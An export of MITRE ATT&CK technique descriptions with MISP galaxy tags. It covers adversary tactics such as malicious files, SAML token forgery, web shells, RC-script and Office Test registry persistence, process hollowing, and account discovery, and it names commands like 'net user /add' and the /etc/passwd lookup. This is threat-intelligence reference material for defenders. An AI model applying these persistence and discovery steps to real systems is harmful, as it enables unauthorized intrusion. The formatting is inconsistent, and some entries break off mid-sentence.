Commands such as `<code>net user</code>` and `<code>net localgroup</code>` of the [Net](https://attack.mitre.org/software/S0039) utility and `<code>id</code>` and `<code>groups</code>` on macOS and Linux can list local users and groups. On Linux, local users can also be enumerated through the use of the `<code>/etc/passwd</code>` file.
Malicious File - T1204.002

An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.

Adversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) on the file to increase the likelihood that a user will open it.

While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).

The tag is: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002"

Software Packing - T1027.002

Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code. (Citation: ESET FinFisher Jan 2018)

Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, (Citation: Wikipedia Exe Compression) but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.

The tag is: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002"
Malicious Image - T1204.003

Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)

Adversaries may also name images a certain way to increase the chance of users mistakenly deploying an instance or container from the image (ex: [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).

The tag is: misp-galaxy:mitre-attack-pattern="Malicious Image - T1204.003"

Transport Agent - T1505.002

Adversaries may abuse Microsoft transport agents to establish persistent access to systems. Microsoft Exchange transport agents can operate on email messages passing through the transport pipeline to perform various tasks such as filtering spam, filtering malicious attachments, journaling, or adding a corporate signature to the end of all outgoing emails.(Citation: Microsoft TransportAgent Jun 2016)(Citation: ESET LightNeuron May 2019) Transport agents can be written by application developers and then compiled to .NET assemblies that are subsequently registered with the Exchange server. Transport agents will be invoked during a specified stage of email processing and carry out developer defined tasks.

Adversaries may register a malicious transport agent to provide a persistence mechanism in Exchange Server that can be triggered by adversary-specified email events.(Citation: ESET LightNeuron May 2019) Though a malicious transport agent may be invoked for all emails passing through the Exchange transport pipeline, the agent can be configured to only carry out specific tasks in response to adversary defined criteria. For example, the transport agent may only carry out...
an action like copying in-transit attachments and saving them for later exfiltration if the recipient email address matches an entry on a list provided by the adversary.

The tag is: `misp-galaxy:mitre-attack-pattern="Transport Agent - T1505.002"`

### SAML Tokens - T1606.002

An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the `<code>NotOnOrAfter</code>` value of the `<code>conditions ...</code>` element in a token. This value can be changed using the `<code>AccessTokensLifetime</code>` in a `<code>TokenPolicy</code>` element in a token.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)

An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.

An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)

The tag is: `misp-galaxy:mitre-attack-pattern="SAML Tokens - T1606.002"`
Upload Tool - T1608.002

Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or commercial. Tools can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.

Tools may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).(Citation: Dell TG-3390) Tools can also be staged on web services, such as an adversary controlled GitHub repo.

Adversaries can avoid the need to upload a tool by having compromised victim machines download the tool directly from a third-party hosting location (ex: a non-adversary controlled GitHub repo), including the original hosting site of the tool.

The tag is: *misp-galaxy:mitre-attack-pattern="Upload Tool - T1608.002"*

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Domain Groups - T1069.002

Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.

Commands such as `<code>net group /domain</code>` of the [Net](https://attack.mitre.org/software/S0039) utility, `<code>dscacheutil -q group</code>` on macOS, and `<code>Idapsearch</code>` on Linux can list domain-level groups.

The tag is: *misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002"*

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Domain Accounts - T1078.002

Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services. (Citation: Microsoft AD Accounts)

Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.

The tag is: *misp-galaxy:mitre-attack-pattern="Domain Accounts - T1078.002"

Table 3527. Table References

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Domain Account - T1087.002

Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior.

Commands such as `<code>net user /domain</code>` and `<code>net group /domain</code>` of the [Net](https://attack.mitre.org/software/S0039) utility, `<code>dscacheutil -q group</code>` on macOS, and `<code>ldapsearch</code>` on Linux can list domain users and groups.

The tag is: *misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002"

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RC Scripts - T1037.004

Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify.

Adversaries can establish persistence by adding a malicious binary path or shell commands to <code>rc.local</code>, <code>rc.common</code>, and other RC scripts specific to the Unix-like distribution. (Citation: IranThreats Kittens Dec 2017) (Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the script's contents as root, resulting in persistence.

Adversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems. (Citation: intezer-kaiji-malware)

Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://attack.mitre.org/techniques/T1053/004). (Citation: Apple Developer Doco Archive Launchd) (Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts. (Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions. (Citation: Ubuntu Manpage systemd rc)

The tag is: misp-galaxy:mitre-attack-pattern="RC Scripts - T1037.004"

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Scheduled Task - T1053.005

Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The <code>schtasks</code> can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.
The deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At (Windows)](https://attack.mitre.org/techniques/T1053/002)), though `<code>at.exe</code>` can not access tasks created with `<code>schtasks</code>` or the Control Panel.

An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM).

The tag is: `misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005"`

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### Web Shell - T1505.003

Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.

In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (ex: [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013)

The tag is: `misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003"`

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Systemd Timers - T1053.006

Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension `<code>.timer</code>` that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments. (Citation: archlinux Systemd Timers Aug 2020)

Each `<code>.timer</code>` file must have a corresponding `<code>.service</code>` file with the same name, e.g., `<code>example.timer</code>` and `<code>example.service</code>`. `<code>.service</code>` files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager. (Citation: Linux man-pages: systemd January 2014) Privileged timers are written to `<code>/etc/systemd/system/</code>` and `<code>/usr/lib/systemd/system/</code>` while user level are written to `<code>~/.config/systemd/user/</code>`.

An adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence. (Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018) (Citation: gist Arch package compromise 10JUL2018) (Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence.

The tag is: `misp-galaxy:mitre-attack-pattern="Systemd Timers - T1053.006"`

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Startup Items - T1037.005

Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items. (Citation: Startup Items)

This is technically a deprecated technology (superseded by [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), and thus the appropriate folder, `<code>/Library/StartupItems</code>` isn’t guaranteed to exist on the system by default, but does
Cloud Groups - T1069.003

Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.

With authenticated access there are several tools that can be used to find permissions groups. The <code>Get-MsolRole</code> PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts. (Citation: Microsoft Msolrole)(Citation: GitHub Raindance)

Azure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command &lt;code&gt;az ad user get-member-groups&lt;/code&gt; will list groups associated to a user account for Azure while the API endpoint &lt;a href="https://cloudidentity.googleapis.com/v1/groups" class="bare">https://cloudidentity.googleapis.com/v1/groups</a>; lists group resources available to a user for Google. (Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation)

The tag is: <code>misp-galaxy:mitre-attack-pattern="Cloud Groups - T1069.003"</code>

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</table>
Email Account - T1087.003

Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs). (Citation: Microsoft Exchange Address Lists)

In on-premises Exchange and Exchange Online, the `<code>Get-GlobalAddressList</code>` PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session. (Citation: Microsoft `getglobaladdresslist`) (Citation: Black Hills Attacking Exchange MailSniper, 2016)

In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization. (Citation: Google Workspace Global Access List)

The tag is: `misp-galaxy:mitre-attack-pattern="Email Account - T1087.003"`

Table 3535. Table References

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Local Accounts - T1078.003

Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.

Local Accounts may also be abused to elevate privileges and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement.

The tag is: `misp-galaxy:mitre-attack-pattern="Local Accounts - T1078.003"`

Table 3536. Table References
Network Topology - T1590.004

Adversaries may gather information about the victim’s network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network topologies may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: DNS Dumpster) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).

The tag is: *misp-galaxy:mitre-attack-pattern="Network Topology - T1590.004"

Table 3537. Table References

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Unix Shell - T1059.004

Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.

Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.

Adversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.
Cloud Accounts - T1078.004

Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management systems, such as Windows Active Directory.

(Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)

Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment.

Cloud Account - T1087.004

Adversaries may attempt to get a listing of cloud accounts. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application.

With authenticated access there are several tools that can be used to find accounts. The <code>Get-MsolRoleMember</code> PowerShell cmdlet can be used to obtain account names given a role or permissions group in Office 365.(Citation: Microsoft msolrolemember)(Citation: GitHub Raindance) The Azure CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated access.
to a domain. The command `<code>az ad user list</code>` will list all users within a domain.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)

The AWS command `<code>aws iam list-users</code>` may be used to obtain a list of users in the current account while `<code>aws iam list-roles</code>` can obtain IAM roles that have a specified path prefix.(Citation: AWS List Roles)(Citation: AWS List Users) In GCP, `<code>gcloud iam service-accounts list</code>` and `<code>gcloud projects get-iam-policy</code>` may be used to obtain a listing of service accounts and users in a project.(Citation: Google Cloud - IAM Servie Accounts List API)

The tag is: `misp-galaxy:mitre-attack-pattern="Cloud Account - T1087.004"`

### Table 3540. Table References

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### IP Addresses - T1590.005

Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about assigned IP addresses may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
Visual Basic - T1059.005

Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core. (Citation: VB .NET Mar 2020) (Citation: VB Microsoft)

Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications. (Citation: Microsoft VBA) (Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support). (Citation: Microsoft VBScript)

Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads.
**Proc Memory - T1055.009**

Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process.

Proc memory injection involves enumerating the memory of a process via the /proc filesystem (<code>/proc/[pid]</code>) then crafting a return-oriented programming (ROP) payload with available gadgets/instructions. Each running process has its own directory, which includes memory mappings. Proc memory injection is commonly performed by overwriting the target processes’ stack using memory mappings provided by the /proc filesystem. This information can be used to enumerate offsets (including the stack) and gadgets (or instructions within the program that can be used to build a malicious payload) otherwise hidden by process memory protections such as address space layout randomization (ASLR). Once enumerated, the target processes’ memory map within <code>/proc/[pid]/maps</code> can be overwritten using dd.(Citation: Uninformed Needle)(Citation: GDS Linux Injection)(Citation: DD Man)

Other techniques such as [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) may be used to populate a target process with more available gadgets. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), proc memory injection may target child processes (such as a backgrounded copy of sleep).(Citation: GDS Linux Injection)

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via proc memory injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: **misp-galaxy:mitre-attack-pattern="Proc Memory - T1055.009"**

**Table 3543. Table References**

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**Link Target - T1608.005**

Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as
in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002), an adversary must set up the resources for a link target for the spearphishing link.

Typically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003). (Citation: Malwarebytes Silent Librarian October 2020) (Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user.

Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Link shortening services can also be employed.

The tag is: `misp-galaxy:mitre-attack-pattern="Link Target - T1608.005"`

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### Standard Encoding - T1132.001

Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME. (Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.

The tag is: `misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001"`

### Table 3545. Table References

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Local Account - T1136.001

Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. With a sufficient level of access, the `net user /add` command can be used to create a local account.

Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.

The tag is: `misp-galaxy:mitre-attack-pattern="Local Account - T1136.001"`

### Table 3546. Table References

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Internal Defacement - T1491.001

An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster) Disturbing or offensive images may be used as a part of [Internal Defacement](https://attack.mitre.org/techniques/T1491/001) in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware)

The tag is: `misp-galaxy:mitre-attack-pattern="Internal Defacement - T1491.001"`

### Table 3547. Table References

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Control Panel - T1218.002

Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.

Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are
actually renamed dynamic-link library (dll) files that export a <code>CPlApplet</code> function. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel. (Citation: Microsoft Implementing CPL) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013)

Malicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware. (Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.

Adversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to <code>HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls</code>. Even when these registered DLLs do not comply with the CPL file specification and do not export <code>CPlApplet</code> functions, they are loaded and executed through its <code>DllEntryPoint</code> when Control Panel is executed. CPL files not exporting <code>CPlApplet</code> are not directly executable. (Citation: ESET InvisiMole June 2020)

The tag is: misp-galaxy:mitre-attack-pattern="Control Panel - T1218.002"

Table 3548. Table References

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Domain Account - T1136.002

Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the <code>net user /add /domain</code> command can be used to create a domain account.

Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Office Test - T1137.002

Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation. (Citation: Hexacorn Office Test) (Citation: Palo Alto Office Test Sofacy)

There exist user and global Registry keys for the Office Test feature:

- `<code>HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf</code>`
- `<code>HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf</code>`

Adversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started.

The tag is: `misp-galaxy:mitre-attack-pattern="Office Test - T1137.002"

System Firmware - T1542.001

Adversaries may modify system firmware to persist on systems. The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)

System firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.
External Defacement - T1491.002

An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda. (Citation: FireEye Cyber Threats to Media Industries)(Citation: Kevin Mandia Statement to US Senate Committee on Intelligence)(Citation: Anonymous Hackers Deface Russian Govt Site) [External Defacement](https://attack.mitre.org/techniques/T1491/002) may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). (Citation: Trend Micro Deep Dive Into Defacement)

The tag is: misp-galaxy:mitre-attack-pattern="External Defacement - T1491.002"

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Process Hollowing - T1055.012

Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process.

Process hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim process can be created with native Windows API calls such as <code>CreateProcess</code>, which includes a flag to suspend the processes primary thread. At this point the process can be unmapped using APIs calls such as <code>ZwUnmapViewOfSection</code> or <code>NtUnmapViewOfSection</code> before being written to, realigned to the injected code, and resumed via <code>VirtualAllocEx</code>, <code>WriteProcessMemory</code>, <code>SetThreadContext</code>, then <code>ResumeThread</code> respectively. (Citation: Leitch Hollowing) (Citation: Elastic Process Injection July 2017)

This is very similar to [Thread Local Storage](https://attack.mitre.org/techniques/T1055/005) but creates a new process rather than targeting an existing process. This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process hollowing may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: *misp-galaxy:mitre-attack-pattern="Process Hollowing - T1055.012"

Table 3553. Table References

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Business Relationships - T1591.002

Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization's business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim's hardware and software resources.

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business relationships may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). (Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex:
Phishing for Information ([https://attack.mitre.org/techniques/T1598](https://attack.mitre.org/techniques/T1598)) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).

The tag is: *misp-galaxy:mitre-attack-pattern="Business Relationships - T1591.002”*

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**Cloud Account - T1136.003**

